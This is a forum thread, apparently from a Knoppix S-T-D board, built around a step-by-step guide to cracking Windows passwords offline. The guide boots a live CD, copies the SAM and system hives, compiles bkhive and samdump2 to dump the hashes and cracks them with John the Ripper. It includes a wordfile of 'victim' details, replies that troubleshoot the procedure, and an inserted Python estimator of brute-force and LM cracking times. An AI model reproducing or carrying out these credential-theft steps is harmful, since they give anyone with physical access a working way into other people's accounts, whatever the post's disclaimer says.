Topic: HOWTO: Crack windows passwords...

Hi all,

Firstly, this is a HOWTO on getting a Windows password with additional syskey encryption. Second, you're doing this on your own behalf, so don't use it wrongly or viciously. Lastly, there are 5 steps below for doing so. Have fun!

Step 1: Boot Knoppix S-T-D and get access to Windows:
Put your Knoppix S-T-D CD in your CD-ROM drive and boot up your computer. Make sure that the BIOS is set to boot from the CD-ROM.
First, we need some information on the system (press ALT+F5 to open the shell in which we will type every command):

cat /etc/fstab

This will output something like this:

proc       /proc       proc   defaults            0 0
pts        /dev/pts    devpts mode=0622           0 0
/dev/fd0   /mnt/auto/floppy auto   user,noauto,exec,umask=000    0 0
/dev/cdrom /mnt/auto/cdrom  auto   user,noauto,exec,ro 0 0

/dev/cdrom1 /mnt/auto/cdrom1  auto   users,noauto,exec,ro 0 0
# Added by KNOPPIX
/dev/hda1 /mnt/hda1 ntfs noauto,users,exec,ro,uid=knoppix,gid=knoppix 0 0

Remember that we want to get the Windows logon password, so in most cases you should look for a hard disk with the
NTFS filesystem. Take a look at the output above. You will see that there is an NTFS hard disk: '/dev/hda1'. To get
access to this drive you have to 'mount' it:

mount -r /dev/hda1 /mnt/hda1

The drive 'hda1' is now mounted at '/mnt/hda1'. Note that you can't write to the NTFS drive, only read from it.

Step 2: Get information needed to crack the password:
Now that we have access to our selected Windows drive, we need two files: the SAM and the system file.
They are located in %WINDIR%\system32\config:

cp /mnt/hda1/WINDOWS/system32/config/SAM SAM
cp /mnt/hda1/WINDOWS/system32/config/system system

The files are now copied to your RAM (which Knoppix S-T-D normally reads from and writes to).

The 'SAM' file contains the security account information of the system's users, and the 'system' hive has the
data to provide a bootkey for syskey (the encryption method). The passwords in SAM are encrypted with MD5 and, on top of that,
with the syskey encryption, which Microsoft calls a "complex obfuscation algorithm".

Step 3: Download and install needed programs:
We now have enough data to retrieve the password(s). First, we need to get the bootkey to
decrypt the syskey encryption. We use a program called 'BkHive'. To obtain the program, type:

wget http://studenti.unina.it/~ncuomo/syskey/bkhive_linux.tgz

(If this throws any exceptions at you, just go here and download it)

You will notice that the file's extension is .tgz, which means that it is compressed. Now create a directory to
extract into, then decompress and compile the program:

mkdir bkhive
cd bkhive
tar xzf ../bkhive_linux.tgz
g++ -o bkhive *.cpp
cd ..

The second program needed is 'Samdump2', which can dump Windows 2k/NT/XP password hashes so they can be cracked.
Download it:

wget http://studenti.unina.it/~ncuomo/syskey/samdump2_linux.tgz

(If this throws any exceptions at you, just go here and download it)
Decompress and compile it:

tar xzf samdump2_linux.tgz
cd des/
tar zxf libdes-4.01.tar.gz
make gcc
cd ..
gcc -c md5_dgst.c rc4_enc.c rc4_skey.c
g++ -o samdump2 samdump2.cpp hive.cpp md5_dgst.o rc4_enc.o rc4_skey.o des/libdes.a 

Step 4: Use the programs to obtain password hashes:
The programs are now installed and ready to be used.
First, we need to get the bootkey to remove the syskey encryption from our password hashes:

bkhive/bkhive system bootkey

Second, we use the bootkey and SAM with samdump2 to write our password hashes to a file:

./samdump2 SAM bootkey > hashes

Step 5: Crack the passwords:

First of all, note that the process of cracking a password can take hours or even days if it is complex and long enough. It can be done faster, but keep in mind that it varies. Also, there are many programs you can use to crack passwords; we will use 'John'. John is preinstalled on Knoppix S-T-D and is free to use. We say that 'Test' is a user on the Windows machine and that the password is 'KANDUSE' (I tried this on my own computer with this information).
Now to the cracking:

/etc/john/john -user:Test hashes

I got the following output:

Loaded 1 password (NT LM DES [24/32 4K])
KANDUSE          (Test:1)
guesses: 1  time: 0:00:14:26 (3)  c/s: 512664  trying: KHERCUL - KNDRROL

It took 14 minutes and 26 seconds to crack it on my computer, but it could just as well have taken 3 minutes or 2 hours or more. Note that if there is more than one user on the computer, you can also leave out the '-user:Test' part if you want John to crack every password at once.

If you have some words that you would like it to check first, you can use a 'wordfile'. A wordfile contains words to try. Example of a wordfile:

victimsname
victimsbirthdate
victimsaddress
... etc.

Put only one word on each line; you can add as many as you like.
Now we want to use the wordfile, so we simply add the parameter "-wordfile:filename", like this:

/etc/john/john -wordfile:my_file password_file

This will speed up the process if you have some good ideas about what the password could be.

If you missed what the cracked password was, you can use this command to show it:

/etc/john/john -show password_file

This will show something like this (I filtered it a bit):

[Username]:[Password]:(additional information here)

x password cracked, x left

It is also good to know that if John cracks a password longer than 8 characters, it will break it into two parts, like this:

Loaded x password (NT LM DES [24/32 4K])
12345678          (Test:1)
9                 (Test:2)
guesses: x  time: x:xx:xx:xx (x)  c/s:xxxx  trying: xxxxx - xxxxx

If you don't know the user names on the computer (and in most cases you probably don't), you can make 'chntpw' list them for you:

chntpw -l SAM

This will generate something like this:

chntpw version 0.99.1 030126, (c) Petter N Hagen
Hive's name (from header): <\SystemRoot\System32\Config\SAM>
ROOT KEY at offset: 0x001020
Page at 0x9000 is not 'hbin', assuming file contains garbage at end
File size 262144 [40000] bytes, containing 8 pages (+ 1 headerpage)
Used for data: 337/29520 blocks/bytes, unused: 11/2992 blocks/bytes.
Hello, this is SAM!
Failed logins before lockout is: 0
Minimum password length        : 0
Password history count         : 0
RID: 01f4, Username: <Administrator>
RID: 03f4, Username: <Test>

Hives that have changed:
 #  Name
None!

Above we used the user 'Test', which is located here in the output:

RID: 03f4, Username: <Test>

To show that password cracking can take less time, we try setting a password on your Knoppix S-T-D and cracking it. Type:

passwd knoppix

The system now requests a password; type 1234, then retype it when asked.
Now we need to dump it to a file so it can be cracked, and use John to do it:

/etc/john/unshadow /etc/passwd /etc/shadow > crack.this
/etc/john/john crack.this

This should not take long, because it is a very easy password to crack.
You will see output much like this:

Loaded 1 password (Standard DES [24/32 4K])
1234             (knoppix)
guesses: 1  time: 0:00:00:00 100% (2)  c/s: 3024  trying: 12345 - robert

This is one approach to retrieving a password for Windows.

I hope someone will find this easy enough to understand and helpful.
Remember!! Only use this if you, e.g., lose your own password or if you need to help your friend.

I take no responsibility whatsoever if you use it unjustly.

Regards.

- Sir Erugor

When the future is certain, you are dead

Re: HOWTO: Crack windows passwords...

Awesome post... I'm sold!!!

Re: HOWTO: Crack windows passwords...

Well, thank you.

- Sir Erugor


Re: HOWTO: Crack windows passwords...

Very nice, my Danish friend.

I like it ... nice and easy to understand.

grep -i "^ * [0-9]" AE001441.gb | cut -c 11-75 | grep -v "^ " | less

Re: HOWTO: Crack windows passwords...

I'm glad, dude!

No problem. Love to help people.

- Sir Erugor


Re: HOWTO: Crack windows passwords...

Well, I have to say I should bribe people some more.

Exceptional work.

Moved to Cracker and stickied.

Re: HOWTO: Crack windows passwords...

;D .. I'm glad you like it, dude.

*bows*

Yeah, I thought it was a Usage HOWTO.

- Sir Erugor


Re: HOWTO: Crack windows passwords...

Yeah, it is as well, but we have all these forums so we might as well use them.

Re: HOWTO: Crack windows passwords...

Of course. I understand.

Btw, as I wrote in the msc. chat, I'd like some more skins for this forum! Here: http://knoppix-S-T-D.org/forum/viewtopi … highlight=

- Sir Erugor


Re: HOWTO: Crack windows passwords...

SirErugor - excellent work, and a very nice HOWTO.

Fat - let's put this on the FAQ list.

--r00t

Everything that has a beginning has an end..   ~~The Oracle
http://www.albanywifi.com


Re: HOWTO: Crack windows passwords...

A few humble suggestions for the next version of this soon-to-be very popular HOWTO:

We need to either identify a method for testing if syskey is enabled, or we should test the impact of using bkhive etc. on a non-syskey-enabled machine.

We should expand on the limitations of brute force by quoting some stats, e.g. if your password has chars, numbers and letters then you may be out of luck, as it will take 2 years to crack. The idea being to educate users to sculpt their brute force attacks based on information they know before kicking it off.

We should explain the difference between LM and NTLM cracking.

We should include an example of a hash file with what the common fields mean.

We should say that breaking the password is always preferable to changing it with chntpw, quoting EFS.

And finally, include a strong warning that messing about with these things could lock you out of your box (although unlikely).

Kudos
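An added example (not part of the thread's HOWTO or of John) for the "sculpt the brute force" suggestion above: the Python below estimates worst-case brute-force time for a few password policies, using the 512664 c/s figure from the John run in the HOWTO as the assumed rate, and contrasts NT hashes with LM hashes, where any password up to 14 characters is uppercased and split into two 7-character halves that are cracked independently. The character-class sizes and the scenarios are assumptions chosen for illustration.

```python
JOHN_CS = 512_664  # candidates/second john reported in the HOWTO run; assumed as the rate here
LOWER, UPPER, DIGITS, SYMBOLS = 26, 26, 10, 33  # printable ASCII character classes
SECONDS_PER_YEAR = 365 * 86400


def keyspace(charset_size: int, max_len: int, min_len: int = 1) -> int:
    """Number of candidates with length min_len..max_len over a charset of charset_size symbols."""
    return sum(charset_size ** n for n in range(min_len, max_len + 1))


def worst_case_seconds(space: int, rate: int = JOHN_CS) -> float:
    """Time to exhaust a keyspace at the given rate; a hit comes on average at about half of this."""
    return space / rate


def lm_keyspace(max_len: int = 14) -> int:
    """Effective LM keyspace: the password is uppercased (lowercase adds nothing), padded to 14
    and split into two 7-character halves that are attacked separately, so the work is the sum
    of the two halves, not the product."""
    chars = UPPER + DIGITS + SYMBOLS
    first = keyspace(chars, min(7, max_len))
    second = keyspace(chars, min(7, max_len - 7))  # 0 when max_len <= 7
    return first + second


def human(seconds: float) -> str:
    for unit, size in (("years", SECONDS_PER_YEAR), ("days", 86400), ("hours", 3600), ("minutes", 60)):
        if seconds >= size:
            return f"{seconds / size:.1f} {unit}"
    return f"{seconds:.0f} seconds"


def plan(scenarios: dict, rate: int = JOHN_CS) -> dict:
    """Map each scenario name to (keyspace, worst-case seconds) at the given rate."""
    return {name: (space, worst_case_seconds(space, rate)) for name, space in scenarios.items()}


# Assumed scenarios: what an attacker knows, or guesses, about the password before starting.
SCENARIOS = {
    "NT, uppercase letters only, up to 7 (like KANDUSE)": keyspace(UPPER, 7),
    "NT, lowercase+digits, exactly 8": keyspace(LOWER + DIGITS, 8, 8),
    "NT, any printable ASCII, exactly 8": keyspace(LOWER + UPPER + DIGITS + SYMBOLS, 8, 8),
    "LM, any printable ASCII, up to 14": lm_keyspace(14),
}

if __name__ == "__main__":
    for name, (space, secs) in plan(SCENARIOS).items():
        print(f"{name:<52} {space:>22,d} candidates, worst case {human(secs)}")
```

The first row is why the HOWTO's KANDUSE fell in 14 minutes: seven uppercase letters is a few hours at most. The last two rows show the LM/NTLM difference the post above asks for: an 8-character printable-ASCII NT hash is centuries at this rate, while an LM hash of any 14-character password stays within a year because the halves are independent and case is lost.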

Re: HOWTO: Crack windows passwords...

r00t 4orce, thanks. I'm glad you all like it.

fat, yeah, I see there are some shortcomings, but I don't know if I'm gonna write the new one today though. Also, do you want it updated or as a Part Two?

- Sir Erugor



Re: HOWTO: Crack windows passwords...

No rush, old boy, whenever you get the time. I think it is better to edit and expand on this one as the definitive single HOWTO.

Re: HOWTO: Crack windows passwords...

Hehe, I shall not rush then.

Yeah, that is most preferable for me too. There are some things that need to be edited; in fact, I have already edited some here and there.

But I will update it.

- Sir Erugor


Re: HOWTO: Crack windows passwords...

Just an FYI, guys -
I will be putting together an S-T-D/Windows version of this ..
i.e. using S-T-D to get the SAM and system files, drop them onto a USB key, and then going "offline" to Windows to use bkhive, samdump2, and john.
Just another "twist" on a good idea. Some users may have a "more powerful" Windows box available than using those 3 parts from the live CD environment of S-T-D.

Stay tuned for the post.

--r00t


Re: HOWTO: Crack windows passwords...

I don't get it.. Isn't it the same as what I have already written?
Well, of course the individual could think of taking it home and doing the same stuff from there, no? :S

- Sir Erugor


Re: HOWTO: Crack windows passwords...

SirErugor - yes, it will be similar to yours, but the actual "cracking" will take place in a Windows environment.
There are a few reasons for this:
Many people that will "find" this thread will probably be more versed in Windows; also, as I mentioned, doing the cracking from a "non-live CD" environment *may* produce faster results, as the system might not be taxed as much ...

--r00t


Re: HOWTO: Crack windows passwords...

Oh, cool! I'm looking forward to that article then.

- Sir Erugor


Re: HOWTO: Crack windows passwords...

root@0[knoppix]# samdump2 SAM bootkey > hashes
bash: samdump2: command not found

^ Why do I get this error?

List of files:

total 3936
drwxr-xr-x    2 root     root          120 2004-12-16 17:13 bkhive
-rw-r--r--    1 root     root         3030 2004-11-27 02:27 bkhive_linux.tgz
-rw-r--r--    1 root     root           16 2004-12-16 17:16 bootkey
drwxr-xr-x    2 root     root           40 2004-12-16 18:00 conf
-rw-r--r--    1 root     root            0 2004-12-16 17:18 crack.this
drwxrwxrwx    5 1004     513          2300 2004-12-16 17:15 des
drwxr-xr-x    3 knoppix  knoppix       200 2004-12-16 17:03 Desktop
-rwxrwxrwx    1 1004     513          9382 2004-03-12 22:45 e_os2.h
-rw-r--r--    1 root     root            0 2004-12-16 17:21 hashes
-rwxrwxrwx    1 1004     513          3417 2004-11-26 11:40 hive.cpp
-rwxrwxrwx    1 1004     513          2510 2004-11-26 11:42 hive.h
-rwx------    1 1004     513           524 2004-11-27 02:29 makedes
-rwx------    1 1004     513           324 2004-11-27 02:31 Makefile
-rwxrwxrwx    1 1004     513         18718 2004-03-12 22:45 md32_common.h
-rwxrwxrwx    1 1004     513          9860 2004-03-12 22:45 md5_dgst.c
-rw-r--r--    1 root     root         6028 2004-12-16 17:15 md5_dgst.o
-rwxrwxrwx    1 1004     513          4638 2004-03-12 22:45 md5.h
-rwxrwxrwx    1 1004     513          7035 2004-03-12 22:45 md5_locl.h
-rwxrwxrwx    1 1004     513          5218 2004-03-12 22:45 opensslconf.h
-rwxrwxrwx    1 1004     513          3656 2004-03-12 22:45 opensslv.h
-rwxrwxrwx    1 1004     513         10531 2004-03-12 22:45 rc4_enc.c
-rw-r--r--    1 root     root         2439 2004-12-16 17:15 rc4_enc.o
-rwxrwxrwx    1 1004     513          3684 2004-03-12 22:45 rc4.h
-rwxrwxrwx    1 1004     513          4350 2004-03-12 22:45 rc4_skey.c
-rw-r--r--    1 root     root         1376 2004-12-16 17:15 rc4_skey.o
-rw-------    1 root     root       262144 2004-12-16 17:12 SAM
-rwxr-xr-x    1 root     root        35126 2004-12-16 17:16 samdump2
-rwxrwxrwx    1 1004     513          9225 2004-03-12 22:45 samdump2.cpp
-rw-r--r--    1 root     root       137392 2004-11-27 02:31 samdump2_linux.tgz
-rw-------    1 root     root      3670016 2004-12-16 17:12 system
drwxr-xr-x    2 knoppix  knoppix        40 2002-12-10 21:34 tmp


Re: HOWTO: Crack windows passwords...

Is it the first error that occurred when trying to break the pwd?

I mean, it should not throw any errors at you if you compiled and installed it nicely. Are you sure you didn't do something other than what I stated in the guide?

- Sir Erugor


Re: HOWTO: Crack windows passwords...

I'm sure ... it's the 4th time I've run through the tutorial ...


Re: HOWTO: Crack windows passwords...

And yes, it's the first error I get in this tutorial.


Re: HOWTO: Crack windows passwords...

It works now ... I had to write /home/knoppix/samdump2


Re: HOWTO: Crack windows passwords...

Hehe.. how delightful!
It's always nice to solve something yourself..

- Sir Erugor



Re: HOWTO: Crack windows passwords...

Also worth changing the example to use a >8 character password, which john will see as 2 passwords using LM.